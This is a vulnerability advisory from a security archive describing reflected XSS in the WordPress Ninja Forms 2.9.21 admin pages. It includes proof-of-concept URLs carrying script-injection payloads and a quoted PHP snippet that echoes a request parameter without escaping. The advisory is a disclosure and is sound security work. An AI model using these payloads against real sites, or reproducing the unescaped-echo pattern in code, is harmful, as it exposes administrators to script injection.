WordPress Ninja Forms plugin version 2.9.21 suffers from a cross site scripting vulnerability.
6adcd3c50a6ee43b83de713510e2127bead2bf8b1eaa8cfc77a1fd6c29a4a60fTitle: WordPress 'Ninja Forms' Plugin - XSS
Version: 2.9.21
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/07/14
Download: https://wordpress.org/plugins/ninja-forms/
Contacted authors: 2015/07/14
==========================================================
## Description:
==========================================================
Forms created with a simple drag and drop interface. Contact forms, Email collection forms, or any other form you want on your WordPress site.
## Reflected XSS:
==========================================================
Certain parameters are used unsanitized in the admin pages.
PoC:
Log in as admin and visit one of the following URLs:
[URL]/wp-admin/admin.php?page=nf-processing&title=<script>alert(123);</script>
[URL]/wp-admin/admin.php?page=nf-processing&action=</script><script>alert(123);</script>
[URL]/wp-admin/admin.php?page=ninja-forms&tab=notifications&form_id=7&id="><script>alert(132);</script>¬ification-action=new
It looks like there are more vulnerabilities, since the plugin has code like this:
file: subs-cpt.php
...
l.883 if ( isset ( $_REQUEST['ref'] ) ) {
l.884 $ref = $_REQUEST['ref'];
l.885 } else if ( get_transient( 'nf_sub_edit_ref' ) ) {
l.886 $ref = get_transient( 'nf_sub_edit_ref' );
l.887 } else {
l.888 $ref = '';
l.889 }
l.890 ?>
l.891 <input type="hidden" name="ref" value="<?php echo $ref; ?>" />
...
## Solution
==========================================================
No fix available.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed